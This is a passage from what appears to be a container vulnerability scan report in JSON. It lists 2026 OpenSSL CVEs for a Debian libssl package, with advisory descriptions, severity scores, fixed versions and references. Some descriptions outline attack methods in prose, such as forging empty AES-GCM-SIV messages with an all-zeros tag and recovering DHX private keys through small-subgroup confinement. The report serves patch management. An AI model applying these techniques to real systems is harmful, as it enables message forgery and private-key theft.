disabled.\n\nThe implicit rejection mechanism always returns a plaintext value,\nthe symmetric key. This result is deterministic for the ciphertext and the\nprivate key. The length of the decryption result can happen to match the\nlength of the key of the symmetric cipher that was used for the content\nencryption. When a certificate is not provided, the last RecipientInfo\nproducing a key that looks valid will be used. It may cause getting garbage\ncontent on decryption. As a proper way to deal with this a recipient\ncertificate has to be provided to identify the particular RecipientInfo for\ndecryption.\n\nThe FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as\nCMS and S/MIME processing happens outside the OpenSSL FIPS module boundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-514" + ], + "VendorSeverity": { + "alma": 3, + "photon": 1, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 6.3 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-42768", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/a2ca7b2d73e0ffc1eae183fe6e1741dac767cb4f", + "https://github.com/openssl/openssl/commit/bbb151a83041705d9d001ed2f9c12f5523e1b54d", + "https://github.com/openssl/openssl/commit/dd68364107a58841c0a2546812518b65d3a23abd", + "https://github.com/openssl/openssl/commit/f04b377be3d821741c86d1f4bf84dee09f3d5c3e", + "https://nvd.nist.gov/vuln/detail/CVE-2026-42768", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-42768" + ], + "PublishedDate": "2026-06-09T17:17:08.223Z", + "LastModifiedDate": "2026-06-16T02:58:12.833Z" + }, + { + "VulnerabilityID": "CVE-2026-42769", + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42769", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:da67d022c71dc2b204adb03ea07b4da26d1050f7f7c044319d762b8be652407d", + "Title": "openssl: Trust-Anchor Substitution via cert/issuer Typo in CMP rootCaKeyUpdate", + "Description": "Issue Summary: An error in the callback used to verify the certificate\nprovided in a Root CA key update Certificate Management Protocol (CMP)\nmessage response rendered the certificate validation ineffectual, which\ncould lead to escalation of credentials from the Registration Authority (RA)\nlevel to the root Certification Authority (root CA) level.\n\nImpact Summary: The Registration Autority could replace the root CA\ncertificate for the CMP clients with an arbitrary root CA certificate.\n\nOne of the parts of the Certificate Management Protocol (CMP), specified in\nRFC 9810, is Root Certification Authority (root CA) key Rollover,\nwhich is sent by the server in a message with type 'id-it-rootCaKeyUpdate'.\nAs part of these messages, 'newWithOld' certificate, the new root CA\ncertificate signed with the old root CA key, is provided, and verifying its\nsignature is crucial for transferring the trust from the old CA key to the\nnew one.\n\nThe 'id-it-rootCaKeyUpdate' messages are expected to be processed with\nOSSL_CMP_get1_rootCaKeyUpdate(), that is expected to verify the 'newWithOld'\ncertificate. A typo in the certificate chain building code led to adding\nan incorrect certificate ('newWithOld' instead of 'oldRoot') to the\ncertificate chain, rendering the certificate verification process ineffectual\n(only the issuer name and the algorithm OIDs were verified by other parts\nof the verification code).\n\nAn attacker who already has credentials that satisfy the CMP message\nprotection checks can generate a new key pair and use a crafted self-signed\ncertificate in its 'id-it-rootCaKeyUpdate' CMP messages which affected CMP\nclients would accept as a new trust anchor.\n\nSignificant preconditions for the attack (having valid RA-level credentials)\nare the reason the issue was assigned Low severity.\n\nThe FIPS modules are not affected by this issue, as the affected code is\noutside the OpenSSL FIPS module boundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-295" + ], + "VendorSeverity": { + "alma": 3, + "photon": 2, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-42769", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/54d0989997e5fc26057009a9782c3441ce3842fb", + "https://github.com/openssl/openssl/commit/777b363b16fcf2153bb3ded39dc3838713667c44", + "https://github.com/openssl/openssl/commit/d35cd473a271bf3ce7bf3d32af53217fb83ae92c", + "https://github.com/openssl/openssl/commit/d531f21c0fe99067a66fc0ff1161ef127f9cd70b", + "https://nvd.nist.gov/vuln/detail/CVE-2026-42769", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-42769" + ], + "PublishedDate": "2026-06-09T17:17:08.377Z", + "LastModifiedDate": "2026-06-15T18:26:34.447Z" + }, + { + "VulnerabilityID": "CVE-2026-42770", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42770", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:ddb83bca8958e5a7462142e7093e35b76fd417242469a5fc6244e0e8bebf6ab5", + "Title": "openssl: FFC-DH Peer Validation Uses Attacker-Supplied q", + "Description": "Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42)\npeer key, the peer key is not properly checked for the subgroup membership.\n\nImpact summary: A malicious peer which presents an X9.42 key carrying the\nvictim's p and g parameters, a forged q = r (a small prime factor of the\ncofactor (p−1)/q_local), and a public value Y of order r can recover the\nvictim's private key after a small number of key exchange attempts.\n\nWhen EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the\nsubgroup membership check Y^q ≡ 1 (mod p) is performed using the peer's\nown q parameter, not the local key's q. The peer's domain parameters are\nthen matched against the domain parameters of the private key, but the value\nof q is not compared.\n\nA malicious peer who presents an X9.42 key carrying the victim's p, g,\na forged q = r (a small prime factor of the cofactor), and a public\nvalue Y of order r passes all checks. The shared secret then takes only\nr distinct values, leaking priv mod r. Repeating for each small-prime\nfactor of the cofactor and combining via CRT recovers the full private\nkey (Lim–Lee / small-subgroup-confinement attack).\n\nThe realistic attack surface is narrow: principally CMP deployments with\nlong-lived RA/CA DHX keys and bespoke enterprise or government applications\nusing X9.42 DHX static keys with interactive protocols and therefore this\nissue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are affected by this\nissue.", + "Severity": "LOW", + "CweIDs": [ + "CWE-325" + ], + "VendorSeverity": { + "alma": 3, + "photon": 1, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-42770", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/3da5a516cd2635a320ff748503db2cef7c4b0f02", + "https://github.com/openssl/openssl/commit/3ddbb7ab50bd93dfc59cbe08e269a67605aeebdb", + "https://github.com/openssl/openssl/commit/5f452bba2c681423d8fcffd120a19b757ee42e3c", + "https://github.com/openssl/openssl/commit/7fbfde7677ed8808828bf00ff01c937ca04bdda2", + "https://github.com/openssl/openssl/commit/ca2237ab5615641b662183b077f62c08d75e8070", + "https://nvd.nist.gov/vuln/detail/CVE-2026-42770", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-42770" + ], + "PublishedDate": "2026-06-09T17:17:08.523Z", + "LastModifiedDate": "2026-06-16T02:58:00.133Z" + }, + { + "VulnerabilityID": "CVE-2026-45446", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45446", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:0b73beecd9744b5c0e2d6a434218f7276c293c3b1ec743f937ea2856a5224d99", + "Title": "openssl: Incorrect Tag Processing for Empty Messages in AES-GCM-SIV and AES-SIV modes", + "Description": "Issue summary: The implementations of AES-SIV (RFC 5297) and AES-GCM-SIV\n(RFC 8452) mishandle the authentication of AAD (Additional Authenticated\nData) with an empty ciphertext allowing a forgery of such messages.\n\nImpact summary: An attacker can forge empty messages with arbitrary AAD\nto the victim's application using these ciphers.\n\nAES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) are nonce-misuse-resistant AEAD\nmodes: they accept a key, nonce, optional AAD (bytes that are authenticated\nbut not encrypted), and plaintext, and produces ciphertext plus a 16-byte\ntag. On decrypt, `EVP_DecryptFinal_ex()` is documented to return success only\nif the tag is verified succesfully.\n\nIn OpenSSL's provider implementation of these ciphers, the expected tag is\ncomputed only when decryption function is invoked with non-empty data.\nIf the caller supplies AAD and then calls `EVP_DecryptFinal_ex()` without\ninvocation of the ciphertext update, which can happen when the received\nciphertext length is zero, the tag is never recalculated and still holds its\nall-zeros value.\n\nWhen AES-GCM-SIV is used, an attacker who sends arbitrary AAD, empty\nciphertext, and all-zeros tag passes authentication under any key they do not\nknow, single-shot. When AES-SIV is used, for mounting the attack it's\nnecessary for the application to reuse the decryption context without\nresetting the key.\n\nAES-SIV is implemented since OpenSSL 3.0. AES-GCM-SIV is implemented since\nOpenSSL 3.2.\n\nNo protocols implemented in OpenSSL itself (TLS/CMS/PKCS7/HPKE/QUIC) support\neither AES-GCM-SIV or AES-SIV. To mount an attack, the applications must\nimplement their own protocol and use the EVP interface. Also they must skip the\nciphertext update when a message with an empty ciphertext arrives.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as these algorithms are not FIPS approved and the affected code is\noutside the OpenSSL FIPS module boundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-325" + ], + "VendorSeverity": { + "alma": 3, + "photon": 2, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 3.7 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-45446", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/25b32cd9d41d2bc01b6abc425bb4baf2c2236fdc", + "https://github.com/openssl/openssl/commit/71e2a5d263518cf5866043bd60ee4994d59e53a3", + "https://github.com/openssl/openssl/commit/7fe3f33a3b3a4c487aa4dcdbc87057f66ffd2b85", + "https://github.com/openssl/openssl/commit/daca0f48e4a69a2892a62262bad59e62a8a76598", + "https://github.com/openssl/openssl/commit/eec5e9bf0d867333b8495e456f5235d225798a68", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45446", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-45446" + ], + "PublishedDate": "2026-06-09T17:17:19.137Z", + "LastModifiedDate": "2026-06-16T02:57:01.743Z" + }, + { + "VulnerabilityID": "CVE-2026-7383", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-7383", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:d346a33580ac4f99cf3bff15a861e6f3e39abbc86f3108535a140e7bc51f9a77", + "Title": "openssl: OpenSSL: Heap buffer overflow due to signed integer overflow in Unicode output sizing", + "Description": "Issue summary: A signed integer overflow when sizing the destination\nbuffer for Unicode output in ASN1_mbstring_ncopy() can lead to a heap\nbuffer overflow.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nattacker controlled code execution or other undefined behaviour.\n\nIn ASN1_mbstring_copy() and ASN1_mbstring_ncopy() the destination\nsize for Unicode output is computed in a signed int: by left shift\nof the input character count for BMPSTRING (UTF-16) and\nUNIVERSALSTRING (UTF-32), and by summing per-character byte counts\nfor UTF8STRING. The calculation overflows when the input reaches\naround 2^30 characters. In the worst case (UNIVERSALSTRING at 2^30\ncharacters) the size wraps to zero, OPENSSL_malloc(1) is called, and\nthe subsequent character copy writes several gigabytes past the\none-byte allocation.\n\nX.509 certificate processing routes through ASN1_STRING_set_by_NID(),\nwhose DIRSTRING_TYPE mask excludes UNIVERSALSTRING and whose per-NID\nsize limits cap the input length; no network protocol or\ncertificate-handling path in OpenSSL exercises the overflow.\nTriggering the bug requires an application that calls\nASN1_mbstring_copy() or ASN1_mbstring_ncopy() directly, or registers\na custom string type via ASN1_STRING_TABLE_add(), with\nattacker-controlled input on the order of half a gigabyte or more.\nFor these reasons this issue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by\nthis issue, as the affected code is outside the OpenSSL FIPS module\nboundary.", + "Severity": "LOW", + "CweIDs": [ + "CWE-787" + ], + "VendorSeverity": { + "alma": 3, + "photon": 3, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:H", + "V3Score": 5.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-7383", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + 